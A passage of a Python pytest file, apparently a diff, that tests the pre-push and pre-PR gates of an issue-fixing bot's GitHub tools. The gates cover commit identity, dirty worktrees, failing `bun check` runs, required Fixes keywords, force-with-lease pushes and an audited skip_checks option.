"user.name=wrong", "commit", "-m", "bad"], + check=True, + capture_output=True, + env=bad_env, + ) + + opened_pr = False + + def handler(_request: httpx.Request) -> httpx.Response: + nonlocal opened_pr + opened_pr = True + return httpx.Response( + 201, + json={ + "number": 7, + "html_url": "https://github.com/octo/widget/pull/7", + "head": {"ref": ws.branch}, + "base": {"ref": "main"}, + }, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(handler)) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + body = "## Repro\nrepro\n\n## Cause\ncause\n\n## Fix\nfix\n\n## Verification\nran tests\n\nFixes #42\n" + with pytest.raises(RpcCommandError) as exc: + tool.execute({"title": "fix: x", "body": body}, _ctx()) + assert "identity mismatch" in str(exc.value) + assert not opened_pr + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + finally: + _stop_loop(loop, thread) + + +def test_gh_push_branch_rejects_invalid_identity_scan_range(db: Database, tmp_path: Path) -> None: + """A failing git-log author scan is a push rejection, not an empty successful scan.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="missing base ref", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + subprocess.run( + ["git", "-C", str(ws.repo_dir), "update-ref", "-d", "refs/remotes/origin/main"], check=True, capture_output=True + ) + (ws.repo_dir / "x.txt").write_text("hi\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "x.txt"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "ok", + ], + check=True, + capture_output=True, + env=env, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + with pytest.raises(RpcCommandError) as exc: + tool.execute({}, _ctx()) + msg = str(exc.value) + assert "could not inspect commit authors" in msg + assert "origin/main..HEAD" in msg + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + row = db._conn.execute( + "SELECT error FROM tool_calls WHERE tool='gh_push_branch' ORDER BY id DESC LIMIT 1" + ).fetchone() + assert row is not None and "could not inspect commit authors" in row["error"] + assert "origin/main..HEAD" in row["error"] + finally: + _stop_loop(loop, thread) + + +def test_gh_open_pr_requires_closes_keyword(db: Database, tmp_path: Path) -> None: + """gh_open_pr refuses if the body has the four sections but no Fixes/Closes/Resolves keyword.""" + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(lambda r: httpx.Response(500))) + try: + tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + body = "## Repro\nrepro\n\n## Cause\ncause\n\n## Fix\nfix\n\n## Verification\nran tests\n" + with pytest.raises(RpcCommandError) as exc: + tool.execute({"title": "fix: x", "body": body}, _ctx()) + assert "Fixes #42" in str(exc.value) + finally: + _stop_loop(loop, t) + + +def test_gh_open_pr_refuses_failed_bun_check_before_push_or_pr( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """gh_open_pr sends a failing pre-PR check back to the agent without creating a PR.""" + import os + + opened_pr = False + + def handler(_request: httpx.Request) -> httpx.Response: + nonlocal opened_pr + opened_pr = True + return httpx.Response( + 201, + json={ + "number": 7, + "html_url": "https://github.com/octo/widget/pull/7", + "head": {"ref": "farm/abc12345/some-issue"}, + "base": {"ref": "main"}, + }, + ) + + bindings, loop, t = _bindings(db, tmp_path, httpx.MockTransport(handler)) + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + fake_bun = fakebin / "bun" + fake_bun.write_text( + "#!/bin/sh\n" + 'if [ "$1" != "check" ]; then printf "wrong command: %s\\n" "$1" >&2; exit 2; fi\n' + 'printf "TypeError: property missing\\n" >&2\n' + "exit 1\n", + encoding="utf-8", + ) + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + (bindings.workspace.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"check": "tsc --noEmit"}}) + "\n", + encoding="utf-8", + ) + + try: + tool = next(x for x in build(bindings) if x.name == "gh_open_pr") + body = "## Repro\nrepro\n\n## Cause\ncause\n\n## Fix\nfix\n\n## Verification\nran tests\n\nFixes #42\n" + with pytest.raises(RpcCommandError) as exc: + tool.execute({"title": "fix: x", "body": body}, _ctx()) + finally: + _stop_loop(loop, t) + + msg = str(exc.value) + assert "refusing to open PR" in msg + assert "`bun check` failed before open PR" in msg + assert "TypeError: property missing" in msg + assert not opened_pr + row = db._conn.execute("SELECT error FROM tool_calls WHERE tool='gh_open_pr' ORDER BY id DESC LIMIT 1").fetchone() + assert row is not None + assert "TypeError: property missing" in row["error"] + + +def test_gh_push_branch_rejects_dirty_worktree(db: Database, tmp_path: Path) -> None: + """Pre-push gate refuses if the working tree has uncommitted changes.""" + import os + import subprocess + + # Real upstream + worktree so git status works. + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="dirty test", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + # Make a proper commit (so the identity gate passes). + (ws.repo_dir / "a.txt").write_text("a\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "a.txt"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "ok", + ], + check=True, + capture_output=True, + env=env, + ) + # Now dirty the worktree — uncommitted edit. + (ws.repo_dir / "a.txt").write_text("a-modified\n") + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + with pytest.raises(RpcCommandError) as exc: + tool.execute({}, _ctx()) + assert "working tree is dirty" in str(exc.value) + # Nothing pushed. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + finally: + _stop_loop(loop, thread) + + +def test_gh_push_branch_runs_fix_and_check_before_pushing( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """gh_push_branch must run `bun run fix` then `bun check` (when defined) + before the push reaches the remote. Same gate as `gh_open_pr` so a + follow-up commit can't break CI.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="push gate", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + fix_calls = tmp_path / "fix-calls" + check_calls = tmp_path / "check-calls" + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + fake_bun = fakebin / "bun" + fake_bun.write_text( + "#!/bin/sh\n" + 'if [ "$1" = "run" ] && [ "$2" = "fix" ]; then\n' + f" printf called >> {fix_calls}\n" + ' printf "formatted\\n" > src.txt\n' + " exit 0\n" + "fi\n" + 'if [ "$1" = "check" ]; then\n' + f" printf called >> {check_calls}\n" + " exit 0\n" + "fi\n" + 'printf "unexpected bun call: %s\\n" "$*" >&2\n' + "exit 2\n" + ) + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"fix": "...", "check": "..."}}) + "\n", + encoding="utf-8", + ) + (ws.repo_dir / "src.txt").write_text("original\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "package.json", "src.txt"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "feat: follow-up", + ], + check=True, + capture_output=True, + env=env, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + result = tool.execute({}, _ctx()) + finally: + _stop_loop(loop, thread) + + # Both gates ran, and fix preceded check (both have one call recorded). + assert fix_calls.read_text() == "called" + assert check_calls.read_text() == "called" + # The formatter's diff was committed by the bot as a `style: bun run fix` commit. + log = subprocess.run( + ["git", "-C", str(ws.repo_dir), "log", "--format=%an <%ae> %s", "-n", "2"], + capture_output=True, + text=True, + check=True, + ) + lines = log.stdout.strip().splitlines() + assert lines[0].startswith("robomp-bot style: bun run fix"), lines + # And the branch ended up on the remote at the new head. + assert result.startswith(f"pushed {ws.branch} ") + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert f"refs/heads/{ws.branch}" in refs.stdout.splitlines() + + +def test_gh_push_branch_force_with_lease_recovers_after_amend(db: Database, tmp_path: Path) -> None: + """A divergent local history (amended commit) must push successfully. + + Plain `git push` rejects this as non-fast-forward, leaving the agent stuck. + `--force-with-lease` accepts the rewrite because origin still matches the + ref we last fetched.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="amend recover", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + # First commit + push — fast-forward path. + (ws.repo_dir / "feature.txt").write_text("original\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "feature.txt"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "feat: original", + ], + check=True, + capture_output=True, + env=env, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + tool.execute({}, _ctx()) + + # Confirm origin received the original commit. + first_remote = subprocess.run( + ["git", "-C", str(bare), "rev-parse", f"refs/heads/{ws.branch}"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + + # Now amend the commit (simulates an agent reset-author rebase, or a + # code change applied via `git commit --amend`). + (ws.repo_dir / "feature.txt").write_text("amended\n") + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "feature.txt"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "--amend", + "--no-edit", + ], + check=True, + capture_output=True, + env=env, + ) + new_local = subprocess.run( + ["git", "-C", str(ws.repo_dir), "rev-parse", "HEAD"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + assert new_local != first_remote, "amend must rewrite the SHA" + + # Second push — divergent. Plain `git push` would reject; we expect success. + result = tool.execute({}, _ctx()) + finally: + _stop_loop(loop, thread) + + assert result.startswith(f"pushed {ws.branch} ") + final_remote = subprocess.run( + ["git", "-C", str(bare), "rev-parse", f"refs/heads/{ws.branch}"], + capture_output=True, + text=True, + check=True, + ).stdout.strip() + assert final_remote == new_local, (final_remote, new_local) + + +def test_gh_push_branch_aborts_on_failed_bun_check( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """A failing `bun check` aborts the push and leaves the remote untouched.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="push aborted", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + fake_bun = fakebin / "bun" + fake_bun.write_text( + "#!/bin/sh\n" + 'if [ "$1" = "check" ]; then\n' + ' printf "TypeError: property missing\\n" >&2\n' + " exit 1\n" + "fi\n" + "exit 0\n" + ) + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"check": "tsc --noEmit"}}) + "\n", + encoding="utf-8", + ) + (ws.repo_dir / "feature.txt").write_text("feature\n") + subprocess.run( + ["git", "-C", str(ws.repo_dir), "add", "package.json", "feature.txt"], check=True, capture_output=True + ) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "ok", + ], + check=True, + capture_output=True, + env=env, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + with pytest.raises(RpcCommandError) as exc: + tool.execute({}, _ctx()) + finally: + _stop_loop(loop, thread) + + msg = str(exc.value) + assert "refusing to push" in msg + assert "`bun check` failed before push" in msg + assert "TypeError: property missing" in msg + # The branch must not have reached the remote. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + # Audit row attributes the failure to gh_push_branch, not gh_open_pr. + row = db._conn.execute( + "SELECT tool, error FROM tool_calls WHERE tool='gh_push_branch' ORDER BY id DESC LIMIT 1" + ).fetchone() + assert row is not None + assert "TypeError: property missing" in row["error"] + + +def test_gh_push_branch_skip_checks_bypasses_failing_bun_check( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """`skip_checks=true` bypasses a failing `bun check` and pushes anyway. + + Models the scenario where `main` itself is broken (e.g. an unrelated + formatter/typecheck failure) and the agent has verified that the + failure is pre-existing — re-running the gate forever would never + succeed. + """ + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="skip checks", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + + fakebin = tmp_path / "fakebin" + fakebin.mkdir() + bun_invocations = fakebin / "bun.log" + fake_bun = fakebin / "bun" + fake_bun.write_text( + "#!/bin/sh\n" + f'echo "$@" >> "{bun_invocations}"\n' + # Both `fix` and `check` would fail — but skip_checks must short-circuit + # so this script is never invoked for them. + "exit 1\n" + ) + fake_bun.chmod(0o755) + monkeypatch.setenv("PATH", f"{fakebin}{os.pathsep}{os.environ['PATH']}") + + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"fix": "ruff format", "check": "tsc --noEmit"}}) + "\n", + encoding="utf-8", + ) + (ws.repo_dir / "feature.txt").write_text("feature\n") + subprocess.run( + ["git", "-C", str(ws.repo_dir), "add", "package.json", "feature.txt"], check=True, capture_output=True + ) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "ok", + ], + check=True, + capture_output=True, + env=env, + ) + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + result = tool.execute({"skip_checks": True}, _ctx()) + finally: + _stop_loop(loop, thread) + + assert "pushed" in result + assert "pre-push checks skipped" in result + # Bun was never invoked — both `fix` and `check` were short-circuited. + assert not bun_invocations.exists(), bun_invocations.read_text() + # The branch DID reach the remote. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + # Audit row records the skip. + rows = db._conn.execute( + "SELECT tool, result_json FROM tool_calls WHERE tool='gh_push_branch' ORDER BY id" + ).fetchall() + skipped = [json.loads(r["result_json"] or "{}") for r in rows] + assert any(s.get("skipped") == "bun_run_fix" for s in skipped) + assert any(s.get("skipped") == "bun_check" for s in skipped) + + +def test_gh_push_branch_skip_checks_still_refuses_dirty_worktree( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """`skip_checks=true` MUST still refuse when there are uncommitted changes — + we never let uncommitted diff leak into a remote ref.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / "README.md").write_text("init\n") + for cmd in ( + ["git", "-C", str(seed), "add", "."], + [ + "git", + "-C", + str(seed), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "init", + ], + ["git", "-C", str(seed), "remote", "add", "origin", str(bare)], + ["git", "-C", str(seed), "push", "origin", "main"], + ): + subprocess.run(cmd, check=True, capture_output=True, env=env) + + from robomp.sandbox import SandboxManager + + mgr = SandboxManager(tmp_path / "workspaces") + ws = mgr.ensure_workspace( + repo="octo/widget", + number=42, + title="dirty", + clone_url=str(bare), + default_branch="main", + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + # package.json declares scripts.fix so the dirty-tree gate inside + # _run_pre_publish_bun_fix actually runs (the helper short-circuits to + # a no-op when there is no scripts.fix entry). + (ws.repo_dir / "package.json").write_text( + json.dumps({"scripts": {"fix": "ruff format"}}) + "\n", + encoding="utf-8", + ) + subprocess.run(["git", "-C", str(ws.repo_dir), "add", "package.json"], check=True, capture_output=True) + subprocess.run( + [ + "git", + "-C", + str(ws.repo_dir), + "-c", + "user.email=robomp-bot@example.invalid", + "-c", + "user.name=robomp-bot", + "commit", + "-m", + "wip", + ], + check=True, + capture_output=True, + env=env, + ) + # Now leave an uncommitted edit on disk. + (ws.repo_dir / "dirty.txt").write_text("uncommitted\n") + + github = GitHubClient("tok", transport=httpx.MockTransport(lambda r: httpx.Response(500))) + loop, thread = _make_loop_in_background() + try: + bindings = ToolBindings( + db=db, + github=github, + git_transport=LocalGitTransport(token=None), + repo=_stub_repo(), + issue=IssueInfo( + repo="octo/widget", + number=42, + title="t", + body="", + state="open", + author="alice", + labels=(), + is_pull_request=False, + ), + workspace=ws, + loop=loop, + author_name="robomp-bot", + author_email="robomp-bot@example.invalid", + ) + db.upsert_issue( + key=bindings.issue_key, + repo="octo/widget", + number=42, + state="reproducing", + branch=ws.branch, + session_dir=str(ws.session_dir), + ) + tool = next(x for x in build(bindings) if x.name == "gh_push_branch") + with pytest.raises(RpcCommandError) as exc: + tool.execute({"skip_checks": True}, _ctx()) + finally: + _stop_loop(loop, thread) + + msg = str(exc.value) + assert "dirty worktree" in msg + # Branch did NOT reach the remote. + refs = subprocess.run( + ["git", "-C", str(bare), "for-each-ref", "--format=%(refname)"], + capture_output=True, + text=True, + check=True, + ) + assert not any(r.startswith("refs/heads/farm/") for r in refs.stdout.splitlines()), refs.stdout + + +def test_gh_open_pr_runs_fix_then_check_and_commits_fixup( + db: Database, tmp_path: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + """gh_open_pr runs `bun run fix`, commits any diff as the bot, then runs `bun check`.""" + import os + import subprocess + + bare = tmp_path / "upstream.git" + bare.mkdir() + subprocess.run(["git", "init", "--bare", "--initial-branch=main", str(bare)], check=True, capture_output=True) + seed = tmp_path / "seed" + seed.mkdir() + env = os.environ | { + "GIT_AUTHOR_NAME": "robomp-bot", + "GIT_AUTHOR_EMAIL": "robomp-bot@example.invalid", + "GIT_COMMITTER_NAME": "robomp-bot", + "GIT_COMMITTER_EMAIL": "robomp-bot@example.invalid", + } + subprocess.run(["git", "init", "--initial-branch=main", str(seed)], check=True, capture_output=True) + (seed / 